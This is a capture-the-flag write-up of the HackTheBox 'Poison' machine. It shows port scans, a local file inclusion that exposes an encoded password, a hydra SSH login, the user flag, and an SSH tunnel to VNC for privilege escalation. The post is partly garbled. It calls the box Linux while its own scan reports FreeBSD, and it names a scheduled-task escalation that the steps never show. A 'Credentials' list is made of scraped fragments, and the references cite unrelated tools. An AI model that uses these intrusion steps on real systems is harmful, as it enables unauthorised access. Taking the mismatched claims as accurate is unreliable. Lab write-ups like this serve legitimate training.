Post

HackTheBox - Poison (Linux)

Hack The Box Poison Linux writeup with service enumeration, foothold strategy, and privilege escalation path.

Posted Updated
By Paul
7 min read
HackTheBox - Poison (Linux)

Overview

Field Value
OS Linux
Difficulty Not specified
Attack Surface 22/tcp (ssh), 80/tcp (http)
Primary Entry Vector Local file inclusion and configuration disclosure
Privilege Escalation Path Writable scheduled task/script abuse -> privileged execution

Reconnaissance

  • rustscan
  • nmap
  • ssh
  • feroxbuster
  • unzip
  • vncviewer This command is used here to enumerate the exposed services and collect actionable fingerprints before exploitation. The focus is on discovering open ports, service versions, and protocol behavior that can guide the next attack decision. Key flags are kept visible so the same scan can be reproduced during validation or retesting.
1

rustscan -a $ip --ulimit 5000 -- -A -sV

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

✅[2:27][CPU:13][MEM:43][TUN0:10.10.14.198][/home/n0z0]
🐉 > rustscan -a $ip --ulimit 5000 -- -A -sV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
TCP handshake? More like a friendly high-five!

[~] The config file is expected to be at "/home/n0z0/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.1.254:22
Open 10.129.1.254:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p   -A -sV" on ip 10.129.1.254
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 02:32 JST
NSE: Loaded 157 scripts for scanning.

This command is used here to enumerate the exposed services and collect actionable fingerprints before exploitation. The focus is on discovering open ports, service versions, and protocol behavior that can guide the next attack decision. Key flags are kept visible so the same scan can be reproduced during validation or retesting.

1
2

grc nmap -p- -sC -sV -T4 -A -Pn "$ip" \
-oX "$HOME/work/scans/$(date +%Y%m%d-%H%M%S)_${ip}.xml"

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

✅[2:25][CPU:15][MEM:43][TUN0:10.10.14.198][/home/n0z0]
🐉 > grc nmap -p- -sC -sV -T4 -A -Pn "$ip" \
  -oX "$HOME/work/scans/$(date +%Y%m%d-%H%M%S)_${ip}.xml"
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 02:27 JST
Warning: 10.129.1.254 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.129.1.254
Host is up (0.26s latency).
Not shown: 65496 closed tcp ports (reset), 37 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=10/1%OT=22%CT=1%CU=41173%PV=Y%DS=2%DC=T%G=Y%TM=68DC192
OS:4%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=109%TI=Z%CI=Z%II=RI%TS=21)S
OS:EQ(SP=104%GCD=1%ISR=107%TI=Z%CI=Z%II=RI%TS=21)SEQ(SP=104%GCD=1%ISR=107%T
OS:I=Z%CI=Z%II=RI%TS=22)SEQ(SP=104%GCD=1%ISR=10D%TI=Z%CI=Z%II=RI%TS=21)SEQ(
OS:SP=108%GCD=1%ISR=10A%TI=Z%CI=Z%II=RI%TS=22)OPS(O1=M552NW6ST11%O2=M552NW6
OS:ST11%O3=M280NW6NNT11%O4=M552NW6ST11%O5=M218NW6ST11%O6=M109ST11)WIN(W1=FF
OS:FF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=Y%T=40%W=FFFF%O=M5
OS:52NW6SLL%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4
OS:(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%
OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=
OS:Y%DF=N%T=40%IPL=38%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T
OS:=40%CD=S)

Network Distance: 2 hops
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

TRACEROUTE (using port 587/tcp)
HOP RTT       ADDRESS
1   255.70 ms 10.10.14.1
2   255.80 ms 10.129.1.254

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1593.06 seconds

💡 Why this works
High-quality reconnaissance turns broad network exposure into a short list of exploitable paths. Service/version context allows precision targeting instead of blind exploitation attempts.

Initial Foothold

http://10.129.1.254/browse.php?file=

  • crontab This step is executed to convert reconnaissance findings into direct code execution or authenticated access on the target. The expected result is a shell, a confirmed exploit condition, or credentials that move the attack forward. Outputs are preserved to verify that each transition from discovery to exploitation is technically reproducible.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

This password is secure, it's encoded atleast 13 times.. what could go wrong really..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=

Charix!2#4%6&8(0 Screenshot showing exploitation evidence on poison (step 1) Caption: Screenshot captured during poison at stage 1 of the attack chain.

This step is executed to convert reconnaissance findings into direct code execution or authenticated access on the target. The expected result is a shell, a confirmed exploit condition, or credentials that move the attack forward. Outputs are preserved to verify that each transition from discovery to exploitation is technically reproducible.

1

hydra -L ~/work/htb/Poison/user.txt -p 'Charix!2#4%6&8(0'  ssh://$ip

1
2
3
4
5
6
7
8
9
10
11
12
13

❌[1:42][CPU:3][MEM:46][TUN0:10.10.14.198][/home/n0z0]
🐉 > hydra -L ~/work/htb/Poison/user.txt -p 'Charix!2#4%6&8(0'  ssh://$ip
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-02 01:42:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:10/p:1), ~1 try per task
[DATA] attacking ssh://10.129.1.254:22/
[22][ssh] host: 10.129.1.254   login: charix   password: Charix!2#4%6&8(0
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-10-02 01:43:38

This step is executed to convert reconnaissance findings into direct code execution or authenticated access on the target. The expected result is a shell, a confirmed exploit condition, or credentials that move the attack forward. Outputs are preserved to verify that each transition from discovery to exploitation is technically reproducible.

1
2
3
4
5
6
7

charix@Poison:~ % id
uid=1001(charix) gid=1001(charix) groups=1001(charix)
charix@Poison:~ % uname -n
Poison
charix@Poison:~ % cat user.txt 
eaacdfb2d141b72a589233063604209c
charix@Poison:~ %

💡 Why this works
Initial access succeeds when a real weakness is chained to controlled execution, credential theft, or authenticated pivoting. Captured outputs and callbacks validate that compromise is reproducible.

Privilege Escalation

This command is run to enumerate or abuse local trust boundaries and move from user context to elevated privileges. We are specifically validating permission weaknesses, risky binaries, or policy misconfigurations that permit escalation. Flag usage and resulting output are retained to clearly show why the privilege transition succeeds.

1

unzip secret.zip

1
2
3
4
5

✅[2:40][CPU:9][MEM:49][TUN0:10.10.14.198][...home/n0z0/work/htb/Poison]
🐉 > unzip secret.zip
Archive:  secret.zip
[secret.zip] secret password: 
 extracting: secret

This command is run to enumerate or abuse local trust boundaries and move from user context to elevated privileges. We are specifically validating permission weaknesses, risky binaries, or policy misconfigurations that permit escalation. Flag usage and resulting output are retained to clearly show why the privilege transition succeeds.

1
2

ssh charix@$ip -L 5901:127.0.0.1:5901
vncviewer -passwd secret 127.0.0.1:5901

Screenshot showing exploitation evidence on poison (step 1) Caption: Screenshot captured during poison at stage 1 of the attack chain.

💡 Why this works
Privilege escalation depends on trust boundary mistakes such as unsafe sudo rules, writable execution paths, SUID abuse, or credential reuse. Enumerating and validating these conditions is essential for reliable root/administrator access.

Credentials

  • Tool / Command
  • home/n0z0]
  • __ / ___}
  • github.com/RustScan/RustScan
  • home/n0z0/.rustscan.toml"
  • HOME/work/scans/$(date
  • 22/tcp
  • 80/tcp
  • PHP/5.6.32)
  • Apache/2.4.29

Lessons Learned / Key Takeaways

  • Validate external attack surface continuously, especially exposed admin interfaces and secondary services.
  • Harden secret handling and remove plaintext credentials from reachable paths and backups.
  • Limit privilege boundaries: audit SUID binaries, sudo rules, and delegated scripts/automation.
  • Keep exploitation evidence reproducible with clear command logs and result validation at each stage.

References

  • RustScan: https://github.com/RustScan/RustScan
  • Nmap: https://nmap.org/
  • HackTricks Linux Privilege Escalation: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html
  • GTFOBins: https://gtfobins.org/
  • Certipy: https://github.com/ly4k/Certipy
  • BloodHound: https://github.com/BloodHoundAD/BloodHound
HackTheBox, Linux
php privilege-escalation rce
This post is licensed under CC BY 4.0 by the author.